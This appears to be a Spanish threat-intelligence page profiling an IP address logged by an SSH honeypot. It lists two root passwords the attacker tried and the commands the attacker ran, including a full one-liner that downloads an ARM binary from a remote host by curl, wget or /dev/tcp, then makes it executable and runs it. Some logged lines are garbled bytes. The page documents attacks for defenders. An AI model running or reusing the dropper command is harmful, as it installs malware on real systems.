Amenaza ActivaBAJO

36.155.92.2

Pais de Origen🇨🇳 China
Primera Deteccion12/1/2026
Ultima Actividad12/1/2026
ISPChina Mobile communications corporation
🎯
16
Ataques Totales
🔌
1
Puertos
📡
1
Tipos Ataque
🦠
2
Malware

Geolocalizacion

Pais
🇨🇳 China
Ciudad
Shanghai
ASN
AS56046
ISP
China Mobile communications corporation

Tipos de Ataque

cowrie

Puertos Atacados

22

Malware Asociado

Credenciales Intentadas

🔐root/RNSKd3slTb
1x
🔐root/Aa@123456
1x

Comandos Ejecutados

$nohup $SHELL -c "curl http://47.242.58.84:60109/arm_linux -o /tmp/tuRElclRg7; if [ ! -f /tmp/tuRElclRg7 ]; then wget http://47.242.58.84:60109/arm_linux -O /tmp/tuRElclRg7; fi; if [ ! -f /tmp/tuRElclRg7 ]; then exec 6<>/dev/tcp/47.242.58.84/60109 && echo -n 'GET /arm_linux' >&6 && cat 0<&6 > /tmp/tuRElclRg7 ; chmod +x /tmp/tuRElclRg7 && /tmp/tuRElclRg7 mPBQyUMXLi4XQ8BP4eHu6lfIQwosPw1F1lnm9+rjT8lLDCUpCUPLUfDh9+JQyFwIKCcXRshb5uno41DYQwssMQxE1lDi7PfjWcJFAC8nGUbPT+jv9+FWzlwLLyYDRMhQ4+r56E/JRgkxLQlA12x
$(v\MYMELF1x
$4(JY[ 6w?plUV_1x
$4(JY [ 6w?plUV_1x
$head -c 2622172 > /tmp/gGWg9wYyNs1x
$echo 1 > /dev/null && cat /bin/echo1x

Evaluacion de Riesgo

25
/100
BajoMedioAltoCritico
IP 36.155.92.2 - Amenaza Detectada | TroyanosYVirus.com | TroyanosYVirus.com